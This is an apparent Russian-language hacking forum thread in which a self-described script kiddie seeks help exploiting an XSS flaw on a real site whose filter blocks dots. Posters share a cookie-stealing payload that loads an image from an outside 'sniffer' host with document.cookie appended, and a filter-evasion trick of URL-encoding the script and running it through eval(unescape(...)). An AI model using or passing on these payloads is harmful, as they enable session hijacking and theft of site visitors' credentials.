![]() |
Вообщем ситуация такая...
Есть один сайт с полем ввода данных, это поле не фильтрует запросы и передаёт эти запросы на второй сайт, где правильно составленный запрос выполняется в виде скрипта. Проблема в том, что запрос передаётся в поле, с очень жёсткой фильтрацией символов, и кроме как алерта с простым текстом ни чего сделать не выходит. Кароче: alert("XSS") - выполняется alert(document.cookie) - не выполняется, потому что там есть точка. В чём дело, бро? Как это порешать? |
покажи (ПМ если хочешь)
|
Цитата:
UDP: Легче всё зашифровать, так как точи в доменах и т. п. Тоже будут резаться. |
Цитата:
А как теперь присобочить стандартное: img = new Image(); img.src = "http://sniffer.site.ru/blablabls.gif?"+document.cookie; ? |
Да, я глупый скриптикидди. Но ничего деструктивного делать я не собираюсь, спортивный интерес + новые знания
|
URL-кодируешь весь свой скрипт и запихиваешь его в
eval(unescape('script encoded')) |
| Время: 00:57 |